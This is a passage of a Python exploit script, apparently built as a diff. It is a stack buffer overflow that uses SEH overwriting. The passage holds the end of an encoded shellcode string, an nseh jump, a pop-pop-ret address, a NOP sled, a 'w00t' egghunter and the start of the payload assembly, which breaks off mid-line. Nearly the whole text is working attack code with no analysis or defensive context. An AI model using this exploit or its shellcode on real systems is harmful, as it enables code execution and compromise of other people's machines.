+"\x58\x73\x47\x30\x73\x56\x52\x43\x6f\x31\x44\x61\x78\x62\x6c" +"\x53\x47\x74\x66\x35\x57\x59\x6f\x4a\x75\x6f\x48\x4e\x70\x45" +"\x51\x47\x70\x57\x70\x65\x79\x6f\x34\x71\x44\x62\x70\x43\x58" +"\x46\x49\x4f\x70\x30\x6b\x53\x30\x59\x6f\x6a\x75\x72\x4a\x33" +"\x38\x53\x69\x46\x30\x4b\x52\x69\x6d\x73\x70\x32\x70\x51\x50" +"\x32\x70\x31\x78\x4a\x4a\x36\x6f\x49\x4f\x4b\x50\x39\x6f\x49" +"\x45\x4e\x77\x31\x78\x75\x52\x75\x50\x57\x61\x53\x6c\x6b\x39" +"\x7a\x46\x63\x5a\x54\x50\x71\x46\x32\x77\x43\x58\x6b\x72\x49" +"\x4b\x76\x57\x53\x57\x39\x6f\x38\x55\x46\x37\x42\x48\x38\x37" +"\x48\x69\x57\x48\x49\x6f\x59\x6f\x58\x55\x73\x67\x75\x38\x44" +"\x34\x68\x6c\x57\x4b\x69\x71\x59\x6f\x7a\x75\x51\x47\x6e\x77" +"\x50\x68\x50\x75\x72\x4e\x52\x6d\x51\x71\x6b\x4f\x4a\x75\x31" +"\x78\x52\x43\x70\x6d\x52\x44\x67\x70\x4f\x79\x78\x63\x71\x47" +"\x43\x67\x33\x67\x75\x61\x68\x76\x62\x4a\x55\x42\x70\x59\x56" +"\x36\x7a\x42\x59\x6d\x53\x56\x38\x47\x32\x64\x61\x34\x45\x6c" +"\x76\x61\x35\x51\x6c\x4d\x57\x34\x34\x64\x74\x50\x6b\x76\x43" +"\x30\x50\x44\x30\x54\x52\x70\x50\x56\x53\x66\x53\x66\x42\x66" +"\x46\x36\x70\x4e\x30\x56\x53\x66\x72\x73\x30\x56\x31\x78\x33" +"\x49\x38\x4c\x65\x6f\x4d\x56\x4b\x4f\x59\x45\x4b\x39\x79\x70" +"\x32\x6e\x73\x66\x33\x76\x6b\x4f\x30\x30\x31\x78\x65\x58\x6f" +"\x77\x67\x6d\x31\x70\x79\x6f\x38\x55\x6d\x6b\x6a\x50\x4e\x55" +"\x69\x32\x30\x56\x33\x58\x4c\x66\x4e\x75\x4d\x6d\x4d\x4d\x59" +"\x6f\x38\x55\x37\x4c\x57\x76\x33\x4c\x54\x4a\x6d\x50\x6b\x4b" +"\x4b\x50\x32\x55\x53\x35\x4d\x6b\x63\x77\x57\x63\x73\x42\x32" +"\x4f\x52\x4a\x37\x70\x51\x43\x4b\x4f\x58\x55\x41\x41") + + +buf_totlen = 5000 +dist_seh = 2492 +nseh = "\xeb\x06AA" +seh = 0x1011369e +nops = "\x90" * 10 + +egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" +"\x77\x30\x30\x74" +"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7") + +egg = "w00tw00t" + +payload = "" +payload += "A"*(dist_seh - len(payload)) +payload += nseh +payload += struct.pack("